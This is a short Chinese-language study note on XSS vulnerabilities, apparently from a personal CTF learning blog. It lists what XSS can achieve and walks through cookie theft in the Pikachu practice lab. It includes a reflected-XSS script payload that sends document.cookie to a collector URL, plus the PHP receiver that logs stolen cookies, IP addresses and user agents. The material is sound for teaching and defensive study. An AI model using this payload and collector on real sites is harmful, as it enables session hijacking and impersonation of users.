点击上方蓝字关注!
注:本篇文章为个人学习笔记仅供学习交流。NO.3
2020.8.9
星期日
XSS漏洞危害与利用技巧
在浏览器中XSS漏洞所能做的事情通过XSS漏洞都可以完成。XSS漏洞可实现的功能包括但不限于:窃取用户cookie信息,伪造用户身份;
与浏览器DOM对象进行交互,执行受害者所有可以执行的操作;
获取网页源码;
发起HTTP请求;
使用HTML5 Geolocation API获取地理位置信息;
使用WebRTC API获取网络信息;
发起HTTP请求对内网主机进行扫描,对存在漏洞的主机进行攻击;
个别示例
漏洞平台->PiKachu漏洞平台搭建 利用xss获取cookie 先打开cookie.php修改重定向URL,如下图: 到反射型xss(get)关卡插入如下payload,可以通过修改源代码扩大可输入的字符数,如下:<script>document.location='http://127.0.0.1/pikachu-master/pkxss/xcookie/cookie.php?cookie=' +document.cookie;script>
在输入框插入payload后按回车就会重定向到我们刚才修改的页面。
此时我们登陆后台就可以看到cookie了。
主要获取cookie的PHP代码
<?php include_once '../inc/config.inc.php';include_once '../inc/mysql.inc.php';$link=connect();//这个是获取cookie的api页面if(isset($_GET['cookie'])){ $time=date('Y-m-d g:i:s'); $ipaddress=getenv ('REMOTE_ADDR'); $cookie=$_GET['cookie']; $referer=$_SERVER['HTTP_REFERER']; $useragent=$_SERVER['HTTP_USER_AGENT']; $query="insert cookies(time,ipaddress,cookie,referer,useragent) values('$time','$ipaddress','$cookie','$referer','$useragent')"; $result=mysqli_query($link, $query);}header("Location:http://127.0.0.1/pikachu-master/index.php");//重定向到一个可信的网站?>
- End -
往期推荐CTF自学笔记(三)跨站脚本攻击[一]
CTF自学笔记(三)跨站脚本攻击[二]
觉得不错,请点个在看